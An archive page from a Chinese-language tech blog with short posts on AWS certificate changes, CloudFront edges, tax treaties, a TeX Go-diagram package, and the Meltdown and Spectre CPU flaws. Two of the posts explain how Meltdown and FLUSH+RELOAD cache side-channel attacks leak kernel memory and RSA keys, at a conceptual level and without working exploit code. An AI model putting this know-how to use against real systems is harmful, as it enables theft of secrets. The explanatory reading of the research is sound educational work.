Home » Archive by category "Murmuring" (Page 3)

Amazon CloudWatch Logs 換 SSL Certificate 的 CA

收到標題是「Upcoming Changes to SSL Certificates in Amazon CloudWatch Logs」的信件,說明 Amazon CloudWatch Logs 要換 SSL Certificate 的 CA,看起來是要換成自家的:

We will be updating the certificate authority (CA) for the certificates used by Amazon CloudWatch Logs domain(s), between 8 January 2018 and 22 January 2018. After the updates complete, the SSL/TLS certificates used by Amazon CloudWatch Logs will be issued by Amazon Trust Services (ATS), the same certificate authority (CA) used by AWS Certificate Manager.

然後有提到 cross-sign 的部份,有透過 Starfield 的 Root CA 簽,所以只要下面有任何一個有在 Root CA store 裡面就應該會信任:

The update means that customers accessing AWS webpages via HTTPS (for example, the Amazon CloudWatch Console, customer portal, or homepage) or accessing Amazon CloudWatch Logs API endpoints, whether through browsers or programmatically, will need to update the trusted CA list on their client machines if they do not already support any of the following CAs:
- "Amazon Root CA 1"
- "Starfield Services Root Certificate Authority - G2"
- "Starfield Class 2 Certification Authority"

另外條列出有哪些 API endpoint 會改變:

This upgrade notice covers the following endpoints:
logs.ap-northeast-1.amazonaws.com
logs.ap-northeast-2.amazonaws.com
logs.ap-south-1.amazonaws.com
logs.ap-southeast-1.amazonaws.com
logs.ap-southeast-2.amazonaws.com
logs.ca-central-1.amazonaws.com
logs.eu-central-1.amazonaws.com
logs.eu-west-1.amazonaws.com
logs.eu-west-2.amazonaws.com
logs.eu-west-3.amazonaws.com
logs.us-east-1.amazonaws.com
logs.us-east-2.amazonaws.com
logs.us-west-1.amazonaws.com
logs.us-west-2.amazonaws.com
logs.sa-east-1.amazonaws.com

然後也列出了有哪些系統「應該」會支援:

* Operating Systems With ATS Support
- Microsoft Windows versions that have January 2005 or later updates installed, Windows Vista, Windows 7, Windows Server 2008, and newer versions
- Mac OS X 10.4 with Java for Mac OS X 10.4 Release 5, Mac OS X 10.5 and newer versions
- Red Hat Enterprise Linux 5 (March 2007), Linux 6, and Linux 7 and CentOS 5, CentOS 6, and CentOS 7
- Ubuntu 8.10
- Debian 5.0
- Amazon Linux (all versions)
- Java 1.4.2_12, Java 5 update 2, and all newer versions, including Java 6, Java 7, and Java 8

不過沒看到 Windows XP 耶,不知道是怎樣 XD

Fortnite 看起來沒上 Auto Scaling?(或是沒正確設好?)

Fortnite 遊戲的伺服器放在 AWS 上,看起來這波 Meltdown 的安全更新 (KPTI) 造成非常大的 overhead:

不過看起來出了問題:

We wanted to provide a bit more context for the most recent login issues and service instability. All of our cloud services are affected by updates required to mitigate the Meltdown vulnerability. We heavily rely on cloud services to run our back-end and we may experience further service issues due to ongoing updates.

最有可能的是把 AWS 當作一般的 VPS 在用,另外一種可能是有部份內部服務沒有 scale,造成上了 KPTI 後 overhead 增加,就卡住了...

讀書時間:Meltdown 的攻擊方式

Meltdown 的論文可以在「Meltdown (PDF)」這邊看到。這個漏洞在 Intel 的 CPU 上影響最大,而在 AMD 是不受影響的。其他平台有零星的消息,不過不像 Intel 是這十五年來所有的 CPU 都中獎... (從 Pentium 4 以及之後的所有 CPU)

Meltdown 是基於這些前提,而達到記憶體任意位置的 memory dump:

  • 支援 µOP 方式的 out-of-order execution 以及當失敗時的 rollback 機制。
  • 因為 cache 機制造成的 side channel information leak。
  • 在 out-of-order execution 時對記憶體存取的 permission check 失效。

out-of-order execution 在大學時的計算機組織應該都會提到,不過我印象中當時只講「在確認不相干的指令才會有 out-of-order」。而現代 CPU 做的更深入,包括了兩個部份:

  • 第一個是 µOP 方式,將每個 assembly 拆成更細的 micro-operation,後面的 out-of-order execution 是對 µOP 做。
  • 第二個是可以先執行下去,如果發現搞錯了再 rollback。

像是下面的 access() 理論上不應該被執行到,但現代的 out-of-order execution 會讓 CPU 有機會先跑後面的指令,最後發現不該被執行到後,再將 register 與 memory 的資料 rollback 回來:

而 Meltdown 把後面不應該執行到 code 放上這段程式碼 (這是 Intel syntax assembly):

其中 mov al, byte [rcx] 應該要做記憶體檢查,確認使用者是否有權限存取那個位置。但這邊因為連記憶體檢查也拆成 µOP 平行跑,而產生 race condition:

Meltdown is some form of race condition between the fetch of a memory address and the corresponding permission check for this address.

而這導致後面這段不該被執行到的程式碼會先讀到資料放進 al register 裡。然後再去存取某個記憶體位置造成某塊記憶體位置被讀到 cache 裡。

造成 cache 內的資料改變後,就可以透過 FLUSH+RELOAD 技巧 (side channel) 而得知這段程式碼讀了哪一塊資料 (參考之前寫的「Meltdown 與 Spectre 都有用到的 FLUSH+RELOAD」),於是就能夠推出 al 的值...

而 Meltdown 在 mov al, byte [rcx] 這邊之所以可以成立,另外一個需要突破的地方是 [rcx]。這邊 [rcx] 存取時就算沒有權限檢查,在 virtual address 轉成 physical address 時應該會遇到問題?

原因是 LinuxOS X 上有 direct-physical map 的機制,會把整塊 physical memory 對應到 virtual memory 的固定位置上,這些位置不會再發給 user space 使用,所以是通的:

On Linux and OS X, this is done via a direct-physical map, i.e., the entire physical memory is directly mapped to a pre-defined virtual address (cf. Figure 2).

而在 Windows 上則是比較複雜,但大部分的 physical memory 都有對應到 kernel address space,而每個 process 裡面也都還是有完整的 kernel address space (只是受到權限控制),所以 Meltdown 的攻擊仍然有效:

Instead of a direct-physical map, Windows maintains a multiple so-called paged pools, non-paged pools, and the system cache. These pools are virtual memory regions in the kernel address space mapping physical pages to virtual addresses which are either required to remain in the memory (non-paged pool) or can be removed from the memory because a copy is already stored on the disk (paged pool). The system cache further contains mappings of all file-backed pages. Combined, these memory pools will typically map a large fraction of the physical memory into the kernel address space of every process.

這也是 workaround patch「Kernel page-table isolation」的原理 (看名字大概就知道方向了),藉由將 kernel 與 user 的區塊拆開來打掉 Meltdown 的攻擊途徑。

而 AMD 的硬體則是因為 mov al, byte [rcx] 這邊權限的檢查並沒有放進 out-of-order execution,所以就避開了 Meltdown 攻擊中很重要的一環。

CloudFront 東京加到七個 Edge...

在「Amazon CloudFront announces six new Edge Locations, adding two more in Tokyo, JP, and its first location in Perth, AU」這邊看到 Amazon CloudFront 在東京直接加兩個 Edge,變成七個 Edge 了:

Amazon CloudFront announces six new Edge Locations that are now part of its global network. These six new Edge Locations are located in the following cities:

Perth, Australia; Chennai, India; Rio De Janeiro, Brazil; Los Angeles, California; and two additional Edge Locations in Tokyo, Japan.

再加上大阪還有一個 Edge,日本的量這麼大喔?會跟 Regional Edge 有關嗎...

Meltdown 與 Spectre 都有用到的 FLUSH+RELOAD

MeltdownSpectre 攻擊裡都有用到的 FLUSH+RELOAD 技巧。這個技巧是出自於 2013 年的「Flush+Reload: a High Resolution, Low Noise, L3 Cache Side-Channel Attack」。當時還因此對 GnuPG 發了一個 CVE-2013-4242

FLUSH+RELOAD 是希望透過 shared memory & cache 得到 side channel information,藉此突破安全機制。

論文裡面提到兩個攻擊模式,一種是在同一個 OS 裡面 (same-OS),另外一種是在同一台機器,但是是兩個不同的 VM (cross-VM)。攻擊的前提是要拿到與 GnuPG process 相同的 shared memory。兩個環境的作法都是透過 mmap() GnuPG 的執行檔以取得 shared memory。

在 same-OS 的情況下會使用同一個 process:

To achieve sharing, the spy mmaps the victim’s executable file into the spy’s virtual address space. As the Linux loader maps executable files into the process when executing them, the spy and the victim share the memory image of the mapped file.

在 cross-VM 的情況下會因為 hypervisor 會 dedup 而產生 shared memory:

For the cross-VM scenario we used two different hypervisors: VMware ESXi 5.1 on the HP machine and Centos 6.5 with KVM on the Dell machine. In each hypervisor we created two virtual machines, one for the victim and the other for the spy. The virtual machines run CentOS 6.5 Linux. In this scenario, the spy mmaps a copy of the victim’s executable file. Sharing is achieved through the page de-duplication mechanisms of the hypervisors.

接下來就能夠利用 cache 表演了。基本原理是「存取某一塊記憶體內容,然後計算花了多久取得,就能知道這次存取是從 L1、L2、L3 還是記憶體取得」。所以 FLUSH+RELOAD 就設計了三個步驟:

  • During the first phase, the monitored memory line is flushed from the cache hierarchy.
  • The spy, then, waits to allow the victim time to access the memory line before the third phase.
  • In the third phase, the spy reloads the memory line, measuring the time to load it.

先 flush 掉要觀察的記憶體位置 (用 clflush),然後等待一小段時間,接著掃記憶體區塊,透過時間得知有哪些被存取過 (就會比較快)。這邊跟 cache 架構有關,你不能想要偷看超過 cache 大小的量 (這樣會被 purge 出去),所以通常是盯著關鍵的部份就好。

接著是要搞 GnuPG,先看他在使用 RSA private key 計算的程式碼:

而依照這段程式碼挑好位置觀察後,就開始攻擊收資訊。隨著時間變化就可以看到這樣的資訊:

然後可以觀察出執行的順序:

於是就能夠依照執行順序推敲出 RSA key 了,而實際測試的成果是這樣,在一次的 decrypt 或是 sign 就把 RSA key 還原的差不多了 (96.7%):

We demonstrate the efficacy of the FLUSH+RELOAD attack by using it to extract the private encryption keys from a victim program running GnuPG 1.4.13. We tested the attack both between two unrelated processes in a single operating system and between processes running in separate virtual machines. On average, the attack is able to recover 96.7% of the bits of the secret key by observing a single signature or decryption round.

知道了這個方法後,看 Meltdown 或是 Spectre 才會知道他們用 FLUSH+RELOAD 的原因... (因為在 Meltdown 與 Spectre 裡面就只有帶過去)

Intel CEO 做的真不錯 XDDD

在發生爆發前一個月把自家 Intel 的股票賣到最低限度 XDDD:「Intel was aware of the chip vulnerability when its CEO sold off $24 million in company stock」,引用的新聞是「Intel's CEO Just Sold a Lot of Stock」:

On Nov. 29, Brian Krzanich, the CEO of chip giant Intel (NASDAQ:INTC), reported several transactions in Intel stock in a Form 4 filing with the SEC.

所以十一月底的時候賣掉... 只保留 CEO 最低限額 250 張:

Those two transactions left Krzanich with exactly 250,000 shares -- the bare minimum that he's required to hold as CEO.

來看看獲利會不會被追回 XDDD

台美之間的租稅協定 (還在橋)

看到「因應美稅改 賴揆:加速洽簽台美租稅協定」這則消息,如果沒記錯的話,有不少服務都是美國公司出帳... (像是 AWSSlackGitHub 這類在公司裡很常用的服務)

參考「我國股利、利息及權利金扣繳率(%)一覽表」這邊的資料,應該有機會從 20% 降到 10%?也就是說實付 100 萬的金額本來要多繳 25 萬 (帳要做成 100 萬 / (1 - 0.2) = 125 萬,其中的 20% 是 25 萬萬稅,100 萬實際支付),現在只要繳 11.1 萬 (100 萬 / (1 - 0.1) = 111.1 萬)?

不過有些特殊情況本來就有更優惠的稅務方式 (像是使用國外平台提供服務 (e.g. AWS),而服務的對象也是境外使用者的情況),這些組合可以研究看看要怎麼搞...

在 TeX 上輸出圍棋棋譜的套件 psgo_emitter

忘記是在哪邊看到 avysk/psgo_emitter 這個套件,提供 TeX 語法輸出成圍棋棋盤的圖示,不過說明裡說只支援 Windows 平台:

psgo_emitter is a (Windows) console utility to create go diagrams for go life-and-death problems (tsumego).

可以只輸出角部,像是這段語法:

    \begin{psgopartialboard}{(1,1)(8,6)}
            \stone{black}{b}{3}
            \stone{black}{d}{3}
            \stone{black}{b}{4}
            \stone{white}{d}{5}
            \stone{white}{g}{2}
            \stone{black}{d}{2}
            \stone{white}{b}{5}
            \stone{white}{c}{4}
            \stone{white}{e}{4}
            \stone{white}{e}{3}
            \stone{white}{e}{2}
            \stone{black}{e}{1}
    \end{psgopartialboard}

會輸出這樣的圖:

另外也可以把手順放進去:

    \begin{psgopartialboard}{(1,1)(8,6)}
            \stone{black}{b}{3}
            \stone[\marklb{1}]{black}{a}{2}
            \stone{black}{d}{3}
            \stone{black}{b}{4}
            \stone[\marklb{8}]{white}{f}{1}
            \stone[\marklb{6}]{white}{d}{1}
            \stone{white}{e}{2}
            \stone{white}{g}{2}
            \stone{black}{d}{2}
            \stone{white}{b}{5}
            \stone[\marklb{7}]{black}{b}{2}
            \stone[\marklb{9}]{black}{a}{1}
            \stone{white}{c}{4}
            \stone[\marklb{4}]{white}{c}{2}
            \stone{white}{e}{4}
            \stone[\marklb{5}]{black}{c}{3}
            \stone{white}{e}{3}
            \stone[\marklb{2}]{white}{b}{1}
            \stone{white}{d}{5}
            \stone[\marklb{3}]{black}{a}{4}
            \stone{black}{e}{1}
    \end{psgopartialboard}

就會輸出:

套件還很新,不知道之後會發展成什麼樣子...

Linus (又) 不爽了... XD

看得出來 Linus 對於 Intel 的行為很不爽:「Re: Avoid speculative indirect calls in kernel」。

Please talk to management. Because I really see exactly two possibibilities:

 - Intel never intends to fix anything

OR

 - these workarounds should have a way to disable them.

Which of the two is it?

那個 possibibilities 應該是 typo,但不知道為什麼看起來很有味道 XDDD

Spectre 與 Meltdown 兩套 CPU 的安全漏洞

The Register 發表了「Kernel-memory-leaking Intel processor design flaw forces Linux, Windows redesign」這篇文章,算是頗完整的說明了這次的安全漏洞 (以 IT 新聞媒體標準來看),引用了蠻多資料並且試著說明問題。

而這也使得整個事情迅速發展與擴散超出本來的預期,使得 GoogleProject Zero 提前公開發表了 Spectre 與 Meltdown 這兩套 CPU 安全漏洞。文章非常的長,描述的也比 The Register 那篇還完整:「Reading privileged memory with a side-channel」。

在 Google Project Zero 的文章裡面,把這些漏洞分成三類,剛好依據 CVE 編號分開描述:

  • Variant 1: bounds check bypass (CVE-2017-5753)
  • Variant 2: branch target injection (CVE-2017-5715)
  • Variant 3: rogue data cache load (CVE-2017-5754)

前兩個被稱作 Spectre,由 Google Project Zero、Cyberus Technology 以及 Graz University of Technology 三個團隊獨立發現並且回報原廠。後面這個稱作 Meltdown,由 Google Project Zero 與另外一個團隊獨立發現並且回報原廠。

這兩套 CPU 的安全漏洞都有「官網」,網址不一樣但內容一樣:spectreattack.commeltdownattack.com

影響範圍包括 IntelAMD 以及 ARM,其中 AMD 因為架構不一樣,只有在特定的情況下會中獎 (在使用者自己打開 eBPF JIT 後才會中):

(提到 Variant 1 的情況) If the kernel's BPF JIT is enabled (non-default configuration), it also works on the AMD PRO CPU.

這次的洞主要試著透過 side channel 資訊讀取記憶體內容 (會有一些條件限制),而痛點在於修正 Meltdown 的方式會有極大的 CPU 效能損失,在 Linux 上對 Meltdown 的修正的資訊可以參考「KAISER: hiding the kernel from user space」這篇,裡面提到:

KAISER will affect performance for anything that does system calls or interrupts: everything. Just the new instructions (CR3 manipulation) add a few hundred cycles to a syscall or interrupt. Most workloads that we have run show single-digit regressions. 5% is a good round number for what is typical. The worst we have seen is a roughly 30% regression on a loopback networking test that did a ton of syscalls and context switches.

KAISER 後來改名為 KPTI,查資料的時候可以注意一下。

不過上面提到的是實體機器,在 VM 裡面可以預期會有更多 syscall 與 context switch,於是 Phoronix 測試後發現在 VM 裡效能的損失比實體機器大很多 (還是跟應用有關,主要看應用會產生多少 syscall 與 context switch):「VM Performance Showing Mixed Impact With Linux 4.15 KPTI Patches」。

With these VM results so far it's still a far cry from the "30%" performance hit that's been hyped up by some of the Windows publications, etc. It's still highly dependent upon the particular workload and system how much performance may be potentially lost when enabling page table isolation within the kernel.

這對各家 cloud service 不是什麼好消息,如果效能損失這麼大,不太可能直接硬上 KPTI patch... 尤其是 VPS,對於平常就會 oversubscription 的前提下,KPTI 不像是可行的方案。

可以看到各 VPS 都已經發 PR 公告了 (先發個 PR 稿說我們有在注意,但都還沒有提出解法):「CPU Vulnerabilities: Meltdown & Spectre (Linode)」、「A Message About Intel Security Findings (DigitalOcean)」、「Intel CPU Vulnerability Alert (Vultr)」。

現在可以預期會有更多人投入研究,要怎麼樣用比較少的 performance penalty 來抵抗這兩套漏洞,現在也只能先等了...

Archives